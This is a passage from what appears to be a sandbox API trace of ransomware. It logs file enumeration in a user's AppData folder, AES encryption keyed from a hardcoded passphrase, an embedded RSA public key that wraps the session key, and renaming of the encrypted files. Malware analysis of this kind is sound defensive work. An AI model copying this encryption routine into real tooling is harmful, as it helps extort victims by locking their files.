nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.419] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.419] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.420] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.420] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.420] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.420] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.420] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.420] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.420] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.676] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00001.jrs.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00001.jrs"), bFailIfExists=0) returned 1 [0245.052] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs", dwFileAttributes=0x0) returned 1 [0245.052] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00001.jrs.gsg")) returned 1 [0245.054] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00001.jrs"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00001.jrs.fuck")) returned 1 [0245.055] CryptDestroyHash (hHash=0x28e7df8) returned 1 [0245.055] CryptDestroyKey (hKey=0x28e8078) returned 1 [0245.055] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0245.055] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0245.055] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0245.055] GetLastError () returned 0x0 [0245.055] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00002.jrs")) returned 0x20 [0245.055] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs", dwFileAttributes=0x80) returned 1 [0245.056] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0245.056] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00002.jrs.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0245.057] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs.gsg", dwFileAttributes=0x2) returned 1 [0245.057] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6348) returned 1 [0245.060] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0245.060] lstrlenA (lpString="MotuoOiXYHamtjRCyJXPhxnwzMlQm") returned 29 [0245.060] CryptHashData (hHash=0x28e7df8, pbData=0x2857060, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0245.060] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e7df8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e8078) returned 1 [0245.060] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0245.061] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0245.061] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f4f18) returned 1 [0245.061] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4f18, dwCertEncodingType=0x1, pInfo=0x29355e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935610*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935618*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282de78) returned 1 [0245.061] CryptEncrypt (in: hKey=0x282de78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0245.061] CryptEncrypt (in: hKey=0x282de78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4fa0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f4fa0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0245.061] WriteFile (in: hFile=0x5d44, lpBuffer=0x28f4fa0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28f4fa0*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0245.063] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.065] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.065] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.083] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.083] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.083] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.083] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.083] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.083] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.083] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.083] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.084] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.084] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.084] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.084] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.084] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.084] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.084] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.084] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.085] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.085] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.085] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.085] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.085] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.085] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.085] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.085] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.085] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.086] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.086] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.086] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.086] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.086] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.086] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.086] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.086] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.086] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.087] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.087] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.087] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.087] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.087] 